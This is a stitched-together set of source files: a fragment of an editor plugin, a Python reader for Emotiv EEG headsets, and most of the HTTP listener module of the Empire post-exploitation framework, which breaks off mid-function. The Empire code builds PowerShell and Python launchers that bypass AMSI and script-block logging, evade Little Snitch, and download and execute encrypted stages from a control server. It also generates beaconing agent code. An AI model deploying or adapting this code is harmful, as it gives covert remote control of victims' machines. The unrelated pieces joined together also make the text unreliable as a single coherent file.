processor.handle_refresh_file_from_server(attr, file_name)
def is_visible(self, files):
if len(files) == 0: return False
self._files = [f for f in files if not f.endswith("-meta.xml")]
if len(self._files) == 0: return False
for _file in self._files:
attr = util.get_component_attribute(_file)[0]
if not attr or "url" not in attr:
return False
return True
|
EmotivDeviceReader.py
|
# encoding: utf-8
'''
Created on Dec 18, 2018
@author: Yongrui Huang
'''
import time
from array import *
from ctypes import *
from sys import exit
from multiprocessing import Process
from multiprocessing import Queue
import numpy as np
class EmotivDeviceReader(object):
'''
This class is used to read EEG data from an Emotiv headset.
Attributes:
queue: the queue that stores the EEG data read from the device
'''
def __init__(self):
'''
Constructor
'''
self.queue = Queue(maxsize=-1)
# num_EDR = 0  # counts how many EmotivDeviceReader instances have been created
self.num_start = 0  # counts how many reader sub-processes have been started
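# A multiprocessing.Queue is used (rather than a plain list) because loop() runs in a
# separate Process started by start(); the queue is the only channel that carries the
# band-power arrays back to the parent process for get_data().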
def test(self):
print("real_time_detection.GUI.EmotivDeviceReader.py now test.")
print("test test test test test")
# check_status(self)
def check_status(self):
print("EmotivDeviceReader.py.check_status(self).start...")
'''
check if the device is connect correctly, if not, exit this process
'''
if self.libEDK.IEE_EngineConnect(create_string_buffer(b"Emotiv Systems-5")) != 0:
print("Failed to start up Emotiv Engine.")
exit()
else:
print("Successfully start up Emotiv Engine.")
print("EmotivDeviceReader.py.check_status(self).end...")
# check_status(self)
# loop(self)
def loop(self):
print("EmotivDeviceReader.py..loop(self).start...")
'''
the loop is used to continuously read data from device
'''
try:
self.libEDK = cdll.LoadLibrary("win64/edk.dll")
except Exception as e:
print('Error: cannot load EDK lib:', e)
exit()
print("EmotivDeviceReader.py...successfully connect")
self.IEE_EmoEngineEventCreate = self.libEDK.IEE_EmoEngineEventCreate
self.IEE_EmoEngineEventCreate.restype = c_void_p
self.eEvent = self.IEE_EmoEngineEventCreate()
# print("self.eEvent = self.IEE_EmoEngineEventCreate()")
self.IEE_EmoEngineEventGetEmoState = self.libEDK.IEE_EmoEngineEventGetEmoState
self.IEE_EmoEngineEventGetEmoState.argtypes = [c_void_p, c_void_p]
self.IEE_EmoEngineEventGetEmoState.restype = c_int
# print("self.IEE_EmoEngineEventGetEmoState.restype = c_int")
self.IEE_EmoStateCreate = self.libEDK.IEE_EmoStateCreate
self.IEE_EmoStateCreate.restype = c_void_p
self.eState = self.IEE_EmoStateCreate()
# print("self.eState = self.IEE_EmoStateCreate()")
self.IEE_EngineGetNextEvent = self.libEDK.IEE_EngineGetNextEvent
self.IEE_EngineGetNextEvent.restype = c_int
self.IEE_EngineGetNextEvent.argtypes = [c_void_p]
# print("self.IEE_EngineGetNextEvent.argtypes = [c_void_p]")
self.IEE_EmoEngineEventGetUserId = self.libEDK.IEE_EmoEngineEventGetUserId
self.IEE_EmoEngineEventGetUserId.restype = c_int
self.IEE_EmoEngineEventGetUserId.argtypes = [c_void_p , c_void_p]
# print("self.IEE_EmoEngineEventGetUserId.argtypes = [c_void_p , c_void_p]")
self.IEE_EmoEngineEventGetType = self.libEDK.IEE_EmoEngineEventGetType
self.IEE_EmoEngineEventGetType.restype = c_int
self.IEE_EmoEngineEventGetType.argtypes = [c_void_p]
# print("self.IEE_EmoEngineEventGetType.argtypes = [c_void_p]")
self.IEE_EmoEngineEventCreate = self.libEDK.IEE_EmoEngineEventCreate
self.IEE_EmoEngineEventCreate.restype = c_void_p
# print("self.IEE_EmoEngineEventCreate.restype = c_void_p")
self.IEE_EmoEngineEventGetEmoState = self.libEDK.IEE_EmoEngineEventGetEmoState
self.IEE_EmoEngineEventGetEmoState.argtypes = [c_void_p, c_void_p]
self.IEE_EmoEngineEventGetEmoState.restype = c_int
# print("self.IEE_EmoEngineEventGetEmoState.restype = c_int")
self.IEE_EmoStateCreate = self.libEDK.IEE_EmoStateCreate
self.IEE_EmoStateCreate.argtype = c_void_p
self.IEE_EmoStateCreate.restype = c_void_p
# print("self.IEE_EmoStateCreate.restype = c_void_p")
self.IEE_FFTSetWindowingType = self.libEDK.IEE_FFTSetWindowingType
self.IEE_FFTSetWindowingType.restype = c_int
self.IEE_FFTSetWindowingType.argtypes = [c_uint, c_void_p]
# print("self.IEE_FFTSetWindowingType.argtypes = [c_uint, c_void_p]")
self.IEE_GetAverageBandPowers = self.libEDK.IEE_GetAverageBandPowers
self.IEE_GetAverageBandPowers.restype = c_int
self.IEE_GetAverageBandPowers.argtypes = [c_uint, c_int, c_void_p, c_void_p, c_void_p, c_void_p, c_void_p]
# print("self.IEE_GetAverageBandPowers.argtypes = [c_uint, c_int, c_void_p, c_void_p, c_void_p, c_void_p, c_void_p]")
self.IEE_EngineDisconnect = self.libEDK.IEE_EngineDisconnect
self.IEE_EngineDisconnect.restype = c_int
self.IEE_EngineDisconnect.argtype = c_void_p
# print("self.IEE_EngineDisconnect.argtype = c_void_p")
self.IEE_EmoStateFree = self.libEDK.IEE_EmoStateFree
self.IEE_EmoStateFree.restype = c_int
self.IEE_EmoStateFree.argtypes = [c_void_p]
# print("self.IEE_EmoStateFree.argtypes = [c_void_p]")
self.IEE_EmoEngineEventFree = self.libEDK.IEE_EmoEngineEventFree
self.IEE_EmoEngineEventFree.restype = c_int
self.IEE_EmoEngineEventFree.argtypes = [c_void_p]
# print("self.IEE_EmoEngineEventFree.argtypes = [c_void_p]")
self.check_status()
print("EmotivDeviceReader.py...self.check_status()...")
userID = c_uint(0)
user = pointer(userID)
ready = 0
state = c_int(0)
alphaValue = c_double(0)
low_betaValue = c_double(0)
high_betaValue = c_double(0)
gammaValue = c_double(0)
thetaValue = c_double(0)
alpha = pointer(alphaValue)
low_beta = pointer(low_betaValue)
high_beta = pointer(high_betaValue)
gamma = pointer(gammaValue)
theta = pointer(thetaValue)
channelList = array('I', [3, 7, 9, 12, 16]) # IED_AF3, IED_AF4, IED_T7, IED_T8, IED_Pz
loop_times = 0 # count how many times did while(1) run
# while(1)
while(1):
loop_times += 1
state = self.IEE_EngineGetNextEvent(self.eEvent)
data = []
if state == 0:
eventType = self.IEE_EmoEngineEventGetType(self.eEvent)
self.IEE_EmoEngineEventGetUserId(self.eEvent, user)
if eventType == 16: # libEDK.IEE_Event_enum.IEE_UserAdded
ready = 1
self.IEE_FFTSetWindowingType(userID, 1); # 1: libEDK.IEE_WindowingTypes_enum.IEE_HAMMING
print("User added")
if ready == 1:
for i in channelList:
result = c_int(0)
result = self.IEE_GetAverageBandPowers(userID, i, theta, alpha, low_beta, high_beta, gamma)
if result == 0: # EDK_OK
print("theta: %.6f, alpha: %.6f, low beta: %.6f, high beta: %.6f, gamma: %.6f \n" %
(thetaValue.value, alphaValue.value, low_betaValue.value,
high_betaValue.value, gammaValue.value))
one_read_data = [thetaValue.value, alphaValue.value,
low_betaValue.value, high_betaValue.value, gammaValue.value]
if len(one_read_data) > 0:
data += one_read_data
elif state != 0x0600:
print("Internal error in Emotiv Engine ! ")
if len(data) > 0:
self.queue.put(np.array(data))
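# Each queue item is a flat numpy array holding, per channel in channelList order,
# the five band powers [theta, alpha, low_beta, high_beta, gamma] that were read
# successfully in this pass (up to 5 channels x 5 bands = 25 values).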
# --------------- #
# sleep_time = 0.5
# print("sleep(%f)" % sleep_time)
# print("loop_times(%d)" % loop_times)
# time.sleep(sleep_time)
# if loop_times >= 50:
# break
# while(1)
print("EmotivDeviceReader.py..loop(self).end...")
return 0
# loop(self)
def start(self):
'''
start a sub-process
'''
print("sub_process")
self.num_start += 1
print("num_start: %d " % self.num_start)
sub_process = Process(target=self.loop) # self.loop is the loop(self) function above
print("sub_process.start().start")
sub_process.start()
print("sub_process.start().end")
# error observed when running __main__ from tool.py:
'''
line 204, in start
sub_process.start()
'''
def get_data(self):
'''
read the accumulated band-power (PSD) data from the queue
Returns:
a list of arrays; each array holds theta, alpha, low_beta, high_beta, gamma
per channel, for IED_AF3, IED_AF4, IED_T7, IED_T8, IED_Pz in that order
'''
print("EmotivDeviceReader.get_data().start...")
data_list = []
while self.queue.qsize() > 0:
ele = self.queue.get()
data_list.append(ele)
print("data_list[0]")
print(data_list[0])
print("data_list[1]")
print(data_list[1])
# print(data_list[2])
print("EmotivDeviceReader.get_data().end...")
return data_list
# __main__
if __name__ == '__main__':
print("EmotivDeviceReader.py..__main__.start...")
device_reader = EmotivDeviceReader()
print("device_reader.start()")
device_reader.start()
print("device_reader.start()")
time.sleep(5)
print("for 5 loop: data")
for i in range(5):
print("i:%d" % i)
data = device_reader.get_data()
data = np.array(data)
print(data)
time.sleep(1)
print("EmotivDeviceReader.py..__main__.end...")
# __main__
|
http.py
|
import logging
import base64
import random
import os
import ssl
import time
import copy
import sys
from pydispatch import dispatcher
from flask import Flask, request, make_response
# Empire imports
from lib.common import helpers
from lib.common import agents
from lib.common import encryption
from lib.common import packets
from lib.common import messages
class Listener:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'HTTP[S]',
'Author': ['@harmj0y'],
'Description': ('Starts an http[s] listener (PowerShell or Python) that uses a GET/POST approach.'),
'Category' : ('client_server'),
'Comments': []
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Name' : {
'Description' : 'Name for the listener.',
'Required' : True,
'Value' : 'http'
},
'Host' : {
'Description' : 'Hostname/IP for staging.',
'Required' : True,
'Value' : "http://%s:%s" % (helpers.lhost(), 80)
},
'BindIP' : {
'Description' : 'The IP to bind to on the control server.',
'Required' : True,
'Value' : '0.0.0.0'
},
'Port' : {
'Description' : 'Port for the listener.',
'Required' : True,
'Value' : 80
},
'Launcher' : {
'Description' : 'Launcher string.',
'Required' : True,
'Value' : 'powershell -noP -sta -w 1 -enc '
},
'StagingKey' : {
'Description' : 'Staging key for initial agent negotiation.',
'Required' : True,
'Value' : '2c103f2c4ed1e59c0b4e2e01821770fa'
},
'DefaultDelay' : {
'Description' : 'Agent delay/reach back interval (in seconds).',
'Required' : True,
'Value' : 5
},
'DefaultJitter' : {
'Description' : 'Jitter in agent reachback interval (0.0-1.0).',
'Required' : True,
'Value' : 0.0
},
'DefaultLostLimit' : {
'Description' : 'Number of missed checkins before exiting',
'Required' : True,
'Value' : 60
},
'DefaultProfile' : {
'Description' : 'Default communication profile for the agent.',
'Required' : True,
'Value' : "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
},
'CertPath' : {
'Description' : 'Certificate path for https listeners.',
'Required' : False,
'Value' : ''
},
'KillDate' : {
'Description' : 'Date for the listener to exit (MM/dd/yyyy).',
'Required' : False,
'Value' : ''
},
'WorkingHours' : {
'Description' : 'Hours for the agent to operate (09:00-17:00).',
'Required' : False,
'Value' : ''
},
'ServerVersion' : {
'Description' : 'Server header for the control server.',
'Required' : True,
'Value' : 'Microsoft-IIS/7.5'
},
'StagerURI' : {
'Description' : 'URI for the stager. Must use /download/. Example: /download/stager.php',
'Required' : False,
'Value' : ''
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'Proxy' : {
'Description' : 'Proxy to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'SlackToken' : {
'Description' : 'Your SlackBot API token to communicate with your Slack instance.',
'Required' : False,
'Value' : ''
},
'SlackChannel' : {
'Description' : 'The Slack channel or DM that notifications will be sent to.',
'Required' : False,
'Value' : '#general'
}
}
# required:
self.mainMenu = mainMenu
self.threads = {}
# optional/specific for this module
self.app = None
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
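# DefaultProfile has the form "uri1,uri2,...|User-Agent|optional custom headers";
# only the comma-separated URI list before the first '|' is used here, while the
# user agent and any extra headers are split off later in generate_launcher.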
# set the default staging key to the controller db default
self.options['StagingKey']['Value'] = str(helpers.get_config('staging_key')[0])
def default_response(self):
"""
Returns a default HTTP server page.
"""
page = "<html><body><h1>It works!</h1>"
page += "<p>This is the default web page for this server.</p>"
page += "<p>The web server software is running but no content has been added, yet.</p>"
page += "</body></html>"
return page
def validate_options(self):
"""
Validate all options for this listener.
"""
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
for key in self.options:
if self.options[key]['Required'] and (str(self.options[key]['Value']).strip() == ''):
print helpers.color("[!] Option \"%s\" is required." % (key))
return False
return True
def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default', proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='', listenerName=None):
"""
Generate a basic launcher for the specified listener.
"""
if not language:
print helpers.color('[!] listeners/http generate_launcher(): no language specified!')
if listenerName and (listenerName in self.threads) and (listenerName in self.mainMenu.listeners.activeListeners):
# extract the set options for this instantiated listener
listenerOptions = self.mainMenu.listeners.activeListeners[listenerName]['options']
host = listenerOptions['Host']['Value']
launcher = listenerOptions['Launcher']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
profile = listenerOptions['DefaultProfile']['Value']
uris = [a for a in profile.split('|')[0].split(',')]
stage0 = random.choice(uris)
customHeaders = profile.split('|')[2:]
if language.startswith('po'):
# PowerShell
stager = '$ErrorActionPreference = \"SilentlyContinue\";'
if safeChecks.lower() == 'true':
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
# ScriptBlock Logging bypass
stager += helpers.randomize_capitalization("$GPS=[ref].Assembly.GetType(")
stager += "'System.Management.Automation.Utils'"
stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
stager += "'cachedGroupPolicySettings','N'+'onPublic,Static'"
stager += helpers.randomize_capitalization(").GetValue($null);If($GPS")
stager += "['ScriptB'+'lockLogging']"
stager += helpers.randomize_capitalization("){$GPS")
stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;"
stager += helpers.randomize_capitalization("$GPS")
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}"
stager += helpers.randomize_capitalization("Else{[ScriptBlock].\"GetFie`ld\"(")
stager += "'signatures','N'+'onPublic,Static'"
stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}")
# @mattifestation's AMSI bypass
stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
stager += "'System.Management.Automation.AmsiUtils'"
stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
stager += "'amsiInitFailed','NonPublic,Static'"
stager += helpers.randomize_capitalization(").SetValue($null,$true)};")
stager += "};"
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
stager += helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;")
if userAgent.lower() == 'default':
profile = listenerOptions['DefaultProfile']['Value']
userAgent = profile.split('|')[1]
stager += "$u='"+userAgent+"';"
if 'https' in host:
# allow for self-signed certificates for https connections
stager += "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
if userAgent.lower() != 'none' or proxy.lower() != 'none':
if userAgent.lower() != 'none':
stager += helpers.randomize_capitalization('$wc.Headers.Add(')
stager += "'User-Agent',$u);"
if proxy.lower() != 'none':
if proxy.lower() == 'default':
stager += helpers.randomize_capitalization("$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;")
else:
# TODO: implement form for other proxy
stager += helpers.randomize_capitalization("$proxy=New-Object Net.WebProxy;")
stager += helpers.randomize_capitalization("$proxy.Address = '"+ proxy.lower() +"';")
stager += helpers.randomize_capitalization("$wc.Proxy = $proxy;")
if proxyCreds.lower() == "default":
stager += helpers.randomize_capitalization("$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;")
else:
# TODO: implement form for other proxy credentials
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
domain = username.split('\\')[0]
usr = username.split('\\')[1]
stager += "$netcred = New-Object System.Net.NetworkCredential('"+usr+"','"+password+"','"+domain+"');"
stager += helpers.randomize_capitalization("$wc.Proxy.Credentials = $netcred;")
#save the proxy settings to use during the entire staging process and the agent
stager += "$Script:Proxy = $wc.Proxy;"
# TODO: reimplement stager retries?
#check if we're using IPv6
listenerOptions = copy.deepcopy(listenerOptions)
bindIP = listenerOptions['BindIP']['Value']
port = listenerOptions['Port']['Value']
if ':' in bindIP:
if "http" in host:
if "https" in host:
host = 'https://' + '[' + str(bindIP) + ']' + ":" + str(port)
else:
host = 'http://' + '[' + str(bindIP) + ']' + ":" + str(port)
# code to turn the key string into a byte array
stager += helpers.randomize_capitalization("$K=[System.Text.Encoding]::ASCII.GetBytes(")
stager += "'%s');" % (stagingKey)
# this is the minimized RC4 stager code from rc4.ps1
stager += helpers.randomize_capitalization('$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};')
# prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='POWERSHELL', meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket)
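# The base64-encoded routing packet is later embedded in a "Cookie: session=..."
# header (see the $wc.Headers.Add call below), which lets the control server
# identify the STAGE0 request without any distinctive URI parameters.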
stager += "$ser='%s';$t='%s';" % (host, stage0)
#Add custom headers if any
if customHeaders != []:
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
#If host header defined, assume domain fronting is in use and add a call to the base URL first
#this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
if headerKey.lower() == "host":
stager += helpers.randomize_capitalization("try{$ig=$WC.DownloadData($ser)}catch{};")
stager += helpers.randomize_capitalization("$wc.Headers.Add(")
stager += "\"%s\",\"%s\");" % (headerKey, headerValue)
# add the RC4 packet to a cookie
stager += helpers.randomize_capitalization("$wc.Headers.Add(")
stager += "\"Cookie\",\"session=%s\");" % (b64RoutingPacket)
stager += helpers.randomize_capitalization("$data=$WC.DownloadData($ser+$t);")
stager += helpers.randomize_capitalization("$iv=$data[0..3];$data=$data[4..$data.length];")
# decode everything and kick it over to IEX to kick off execution
stager += helpers.randomize_capitalization("-join[Char[]](& $R $data ($IV+$K))|IEX")
if obfuscate:
stager = helpers.obfuscate(self.mainMenu.installPath, stager, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode and ((not obfuscate) or ("launcher" not in obfuscationCommand.lower())):
return helpers.powershell_launcher(stager, launcher)
else:
# otherwise return the case-randomized stager
return stager
if language.startswith('py'):
# Python
launcherBase = 'import sys;'
if "https" in host:
# monkey patch ssl woohooo
launcherBase += "import ssl;\nif hasattr(ssl, '_create_unverified_context'):ssl._create_default_https_context = ssl._create_unverified_context;\n"
try:
if safeChecks.lower() == 'true':
launcherBase += "import re, subprocess;"
launcherBase += "cmd = \"ps -ef | grep Little\ Snitch | grep -v grep\"\n"
launcherBase += "ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)\n"
launcherBase += "out = ps.stdout.read()\n"
launcherBase += "ps.stdout.close()\n"
launcherBase += "if re.search(\"Little Snitch\", out):\n"
launcherBase += " sys.exit()\n"
except Exception as e:
p = "[!] Error setting LittleSnitch in stager: " + str(e)
print helpers.color(p, color='red')
if userAgent.lower() == 'default':
profile = listenerOptions['DefaultProfile']['Value']
userAgent = profile.split('|')[1]
launcherBase += "import urllib2;\n"
launcherBase += "UA='%s';" % (userAgent)
launcherBase += "server='%s';t='%s';" % (host, stage0)
# prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='PYTHON', meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket)
launcherBase += "req=urllib2.Request(server+t);\n"
# add the RC4 packet to a cookie
launcherBase += "req.add_header('User-Agent',UA);\n"
launcherBase += "req.add_header('Cookie',\"session=%s\");\n" % (b64RoutingPacket)
# Add custom headers if any
if customHeaders != []:
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
#launcherBase += ",\"%s\":\"%s\"" % (headerKey, headerValue)
launcherBase += "req.add_header(\"%s\",\"%s\");\n" % (headerKey, headerValue)
if proxy.lower() != "none":
if proxy.lower() == "default":
launcherBase += "proxy = urllib2.ProxyHandler();\n"
else:
proto = proxy.split(':')[0]
launcherBase += "proxy = urllib2.ProxyHandler({'"+proto+"':'"+proxy+"'});\n"
if proxyCreds != "none":
if proxyCreds == "default":
launcherBase += "o = urllib2.build_opener(proxy);\n"
else:
launcherBase += "proxy_auth_handler = urllib2.ProxyBasicAuthHandler();\n"
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
launcherBase += "proxy_auth_handler.add_password(None,'"+proxy+"','"+username+"','"+password+"');\n"
launcherBase += "o = urllib2.build_opener(proxy, proxy_auth_handler);\n"
else:
launcherBase += "o = urllib2.build_opener(proxy);\n"
else:
launcherBase += "o = urllib2.build_opener();\n"
#install proxy and creds globally, so they can be used with urlopen.
launcherBase += "urllib2.install_opener(o);\n"
# download the stager and extract the IV
launcherBase += "a=urllib2.urlopen(req).read();\n"
launcherBase += "IV=a[0:4];"
launcherBase += "data=a[4:];"
launcherBase += "key=IV+'%s';" % (stagingKey)
# RC4 decryption
launcherBase += "S,j,out=range(256),0,[]\n"
launcherBase += "for i in range(256):\n"
launcherBase += " j=(j+S[i]+ord(key[i%len(key)]))%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += "i=j=0\n"
launcherBase += "for char in data:\n"
launcherBase += " i=(i+1)%256\n"
launcherBase += " j=(j+S[i])%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += " out.append(chr(ord(char)^S[(S[i]+S[j])%256]))\n"
launcherBase += "exec(''.join(out))"
if encode:
launchEncoded = base64.b64encode(launcherBase)
launcher = "echo \"import sys,base64,warnings;warnings.filterwarnings(\'ignore\');exec(base64.b64decode('%s'));\" | python &" % (launchEncoded)
return launcher
else:
return launcherBase
else:
print helpers.color("[!] listeners/http generate_launcher(): invalid language specification: only 'powershell' and 'python' are currently supported for this module.")
else:
print helpers.color("[!] listeners/http generate_launcher(): invalid listener name specification!")
def generate_stager(self, listenerOptions, encode=False, encrypt=True, obfuscate=False, obfuscationCommand="", language=None):
"""
Generate the stager code needed for communications with this listener.
"""
if not language:
print helpers.color('[!] listeners/http generate_stager(): no language specified!')
return None
profile = listenerOptions['DefaultProfile']['Value']
uris = [a.strip('/') for a in profile.split('|')[0].split(',')]
launcher = listenerOptions['Launcher']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
killDate = listenerOptions['KillDate']['Value']
host = listenerOptions['Host']['Value']
customHeaders = profile.split('|')[2:]
# select some random URIs for staging from the main profile
stage1 = random.choice(uris)
stage2 = random.choice(uris)
if language.lower() == 'powershell':
# read in the stager base
f = open("%s/data/agent/stagers/http.ps1" % (self.mainMenu.installPath))
stager = f.read()
f.close()
# make sure the server ends with "/"
if not host.endswith("/"):
host += "/"
#Patch in custom Headers
if customHeaders != []:
headers = ','.join(customHeaders)
stager = stager.replace("$customHeaders = \"\";","$customHeaders = \""+headers+"\";")
#patch in working hours, if any
if workingHours != "":
stager = stager.replace('WORKING_HOURS_REPLACE', workingHours)
#Patch in the killdate, if any
if killDate != "":
stager = stager.replace('REPLACE_KILLDATE', killDate)
# patch the server and key information
stager = stager.replace('REPLACE_SERVER', host)
stager = stager.replace('REPLACE_STAGING_KEY', stagingKey)
stager = stager.replace('index.jsp', stage1)
stager = stager.replace('index.php', stage2)
randomizedStager = ''
for line in stager.split("\n"):
line = line.strip()
# skip commented line
if not line.startswith("#"):
# randomize capitalization of lines without quoted strings
if "\"" not in line:
randomizedStager += helpers.randomize_capitalization(line)
else:
randomizedStager += line
if obfuscate:
randomizedStager = helpers.obfuscate(self.mainMenu.installPath, randomizedStager, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode:
return helpers.enc_powershell(randomizedStager)
elif encrypt:
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV+stagingKey, randomizedStager)
else:
# otherwise just return the case-randomized stager
return randomizedStager
elif language.lower() == 'python':
# read in the stager base
f = open("%s/data/agent/stagers/http.py" % (self.mainMenu.installPath))
stager = f.read()
f.close()
stager = helpers.strip_python_comments(stager)
if host.endswith("/"):
host = host[0:-1]
if workingHours != "":
stager = stager.replace('SET_WORKINGHOURS', workingHours)
if killDate != "":
stager = stager.replace('SET_KILLDATE', killDate)
# # patch the server and key information
stager = stager.replace("REPLACE_STAGING_KEY", stagingKey)
stager = stager.replace("REPLACE_PROFILE", profile)
stager = stager.replace("index.jsp", stage1)
stager = stager.replace("index.php", stage2)
# # base64 encode the stager and return it
if encode:
return base64.b64encode(stager)
if encrypt:
# return an encrypted version of the stager ("normal" staging)
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV+stagingKey, stager)
else:
# otherwise return the standard stager
return stager
else:
print helpers.color("[!] listeners/http generate_stager(): invalid language specification, only 'powershell' and 'python' are currently supported for this module.")
def generate_agent(self, listenerOptions, language=None, obfuscate=False, obfuscationCommand=""):
"""
Generate the full agent code needed for communications with this listener.
"""
if not language:
print helpers.color('[!] listeners/http generate_agent(): no language specified!')
return None
language = language.lower()
delay = listenerOptions['DefaultDelay']['Value']
jitter = listenerOptions['DefaultJitter']['Value']
profile = listenerOptions['DefaultProfile']['Value']
lostLimit = listenerOptions['DefaultLostLimit']['Value']
killDate = listenerOptions['KillDate']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
b64DefaultResponse = base64.b64encode(self.default_response())
if language == 'powershell':
f = open(self.mainMenu.installPath + "./data/agent/agent.ps1")
code = f.read()
f.close()
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_powershell_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('$AgentDelay = 60', "$AgentDelay = " + str(delay))
code = code.replace('$AgentJitter = 0', "$AgentJitter = " + str(jitter))
code = code.replace('$Profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', "$Profile = \"" + str(profile) + "\"")
code = code.replace('$LostLimit = 60', "$LostLimit = " + str(lostLimit))
code = code.replace('$DefaultResponse = ""', '$DefaultResponse = "'+str(b64DefaultResponse)+'"')
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('$KillDate,', "$KillDate = '" + str(killDate) + "',")
if obfuscate:
code = helpers.obfuscate(self.mainMenu.installPath, code, obfuscationCommand=obfuscationCommand)
return code
elif language == 'python':
f = open(self.mainMenu.installPath + "./data/agent/agent.py")
code = f.read()
f.close()
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_python_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('delay = 60', 'delay = %s' % (delay))
code = code.replace('jitter = 0.0', 'jitter = %s' % (jitter))
code = code.replace('profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', 'profile = "%s"' % (profile))
code = code.replace('lostLimit = 60', 'lostLimit = %s' % (lostLimit))
code = code.replace('defaultResponse = base64.b64decode("")', 'defaultResponse = base64.b64decode("%s")' % (b64DefaultResponse))
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('killDate = ""', 'killDate = "%s"' % (killDate))
if workingHours != "":
code = code.replace('workingHours = ""', 'workingHours = "%s"' % (workingHours))
return code
else:
print helpers.color("[!] listeners/http generate_agent(): invalid language specification, only 'powershell' and 'python' are currently supported for this module.")
def generate_comms(self, listenerOptions, language=None):
"""
Generate just the agent communication code block needed for communications with this listener.
This is so agents can easily be dynamically updated for the new listener.
"""
if language:
if language.lower() == 'powershell':
updateServers = """
$Script:ControlServers = @("%s");
$Script:ServerIndex = 0;
""" % (listenerOptions['Host']['Value'])
if listenerOptions['Host']['Value'].startswith('https'):
updateServers += "\n[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
getTask = """
function script:Get-Task {
try {
if ($Script:ControlServers[$Script:ServerIndex].StartsWith("http")) {
# meta 'TASKING_REQUEST' : 4
$RoutingPacket = New-RoutingPacket -EncData $Null -Meta 4
$RoutingCookie = [Convert]::ToBase64String($RoutingPacket)
# build the web request object
$wc = New-Object System.Net.WebClient
# set the proxy settings for the WC to be the default system settings
$wc.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {
$wc.Proxy = $Script:Proxy;
}
$wc.Headers.Add("User-Agent",$script:UserAgent)
$script:Headers.GetEnumerator() | % {$wc.Headers.Add($_.Name, $_.Value)}
$wc.Headers.Add("Cookie", "session=$RoutingCookie")
# choose a random valid URI for checkin
$taskURI = $script:TaskURIs | Get-Random
$result = $wc.DownloadData($Script:ControlServers[$Script:ServerIndex] + $taskURI)
$result
}
}
catch [Net.WebException] {
$script:MissedCheckins += 1
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
"""
sendMessage = """
function script:Send-Message {
param($Packets)
if($Packets) {
# build and encrypt the response packet
